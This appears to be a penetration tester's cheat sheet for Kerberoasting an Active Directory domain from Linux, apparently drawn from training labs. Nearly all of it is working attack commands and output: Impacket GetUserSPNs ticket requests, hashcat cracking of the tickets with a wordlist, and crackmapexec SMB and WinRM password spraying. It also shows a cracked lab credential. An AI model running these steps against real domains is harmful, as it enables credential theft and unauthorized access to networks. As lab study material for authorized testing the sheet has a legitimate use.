🐧Linux - Kerberoasting

Reference

• Impacket toolkit compiled for Windows

Impacket - GetUserSPNs.py

• https://github.com/SecureAuthCorp/impacket

CD into the directory and execute the following:

sudo python3 -m pip install .

Requesting all TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Requesting a Single TGS ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Saving the TGS Ticket to an Output File

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 

Testing Authentication against a Domain Controller

SMB

sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!

crackmapexec smb dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success

example

┌──(16:14:22 eo㉿offsec)-[~/exam/192.168.89.165/creds]
└─$ crackmapexec smb dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success 
SMB         DC01.heist.offsec 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:heist.offsec) (signing:True) (SMBv1:False)
SMB         DC01.heist.offsec 445    DC01             [+] heist.offsec\enox:california 

winrm

crackmapexec winrm dc01.heist.offsec -u users.txt -p passwords.txt --continue-on-success

example

┌──(16:16:07 eo㉿offsec)-[~/exam/192.168.89.165/creds]
└─$ crackmapexec winrm dc01.heist.offsec -u users.txt -p passwords.txt
SMB         DC01.heist.offsec 5985   NONE             [*] None (name:dc01.heist.offsec) (domain:None)
HTTP        DC01.heist.offsec 5985   NONE             [*] http://DC01.heist.offsec:5985/wsman
WINRM       DC01.heist.offsec 5985   NONE             [-] None\enox:california "unsupported hash type md4"
WINRM       DC01.heist.offsec 5985   NONE             [-] None\administrator:california "unsupported hash type md4"
WINRM       DC01.heist.offsec 5985   NONE             [-] None\krbtgt:california "unsupported hash type md4"